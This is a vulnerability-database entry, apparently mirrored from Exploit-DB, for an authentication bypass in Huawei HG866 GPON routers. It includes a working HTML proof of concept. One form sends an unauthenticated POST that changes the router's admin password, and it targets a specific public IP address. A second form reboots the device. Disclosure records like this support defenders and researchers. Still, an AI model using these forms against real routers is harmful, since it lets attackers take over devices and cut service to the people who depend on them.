ID
VAR-E-201206-0265
EDB ID
19185
TITLE
Huawei HG866 - Authentication Bypass - Hardware webapps Exploit
Trust: 0.6
DESCRIPTION
Huawei HG866 - Authentication Bypass. CVE-83117 . webapps exploit for Hardware platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | huawei | model: | hg866 | scope: | - | version: | - | Trust: 1.6 |
EXPLOIT
# Exploit Title: Huawei HG866 Authentication Bypass
# Date: Jun 14 2012
# Exploit Author: hkm
# Vendor Homepage: http://www.huawei.com
# Version: V1R2C01SPC202, R3.2.4.92sbn - R3.4.2.257sbn, 3FE53864AOCB16
# Tested on: HG866GTA_VER.C, 01, 02
# Advisory: http://websec.mx/advisories/view/Evasion_de_autenticacion_en_Huawei_HG866
Huawei HG866 GPON routers don't properly validate the session on every page. It is possible to change the web interface admin password by performing an unauthenticated post directly to the form.
PoC / Exploit:
<!--Changes root password --!>
<form name=hg866bypass action=http://187.162.144.50/html/password.html method=post >
<input name=psw value=password ><input name=reenterpsw value=password >
<input type="submit" name="save" value="Apply" />
</form>
<!--Reboots the device --!>
<form name=hg866dos action=http://192.168.100.251/html/admin_reboot.html" method="post">
<input type=submit name=save id=save value=Reboot />
</form>
hkm
Trust: 1.0
EXPLOIT LANGUAGE
txt
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Authentication Bypass
Trust: 1.6
CREDITS
hkm
Trust: 0.6
EXTERNAL IDS
| db: | EXPLOIT-DB | id: | 19185 | Trust: 1.6 |
| db: | EDBNET | id: | 41407 | Trust: 0.6 |
REFERENCES
| url: | http://websec.mx/advisories/view/evasion_de_autenticacion_en_huawei_hg866 | Trust: 1.0 |
| url: | https://www.exploit-db.com/exploits/19185/ | Trust: 0.6 |
SOURCES
| db: | EXPLOIT-DB | id: | 19185 |
| db: | EDBNET | id: | 41407 |
LAST UPDATE DATE
2022-07-27T09:12:16.013000+00:00
SOURCES RELEASE DATE
| db: | EXPLOIT-DB | id: | 19185 | date: | 2012-06-16T00:00:00 |
| db: | EDBNET | id: | 41407 | date: | 2012-06-16T00:00:00 |